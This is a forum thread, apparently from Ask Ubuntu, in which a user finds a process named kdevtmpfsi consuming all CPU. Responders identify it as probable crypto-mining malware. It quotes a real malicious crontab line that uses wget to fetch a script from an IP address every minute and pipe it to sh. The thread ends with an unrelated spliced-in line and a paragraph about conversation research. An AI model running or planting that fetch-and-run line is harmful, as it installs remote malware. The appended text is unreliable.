kdevtmpfsi using the entire CPU

adam78

2/1/24, 4:14 PM

I noticed the cpu on ubuntu is 100% used by a process named kdevtmpfsi

Anyone know what this is -is it malware?

In /var/spool/cron/crontabs/www-data i came across the following cron job:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Feb  1 05:30:10 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

Is this legitimate or again malware?

487

0 + 4

cron

malware

Doug Smythies

2/1/24, 4:27 PM

yes that looks bad. the IP address is Russia, Moscow. and it is executing a script. I suggest download the script manually and look at what it is doing. Also check all of your logs in `/var/log` for how this happened at 2023.02.01 05:30:10.

adam78

2/1/24, 4:53 PM

@DougSmythies which log file would i be looking at? Sorry I'm still a newbie on server management.

Doug Smythies

2/1/24, 4:55 PM

All of them. also look [here](https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu). You seems to have a crypto mining malware.

user253751

2/1/24, 6:30 PM

this cron script definitely isn't part of the operating system. Good job spotting it. No serious package would use a script like this. It says every 1 minute, download this file and run it.

Elon Musk

I sit in a Tesla and translated this thread with Ai:

EN: kdevtmpfsi using the entire CPU

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.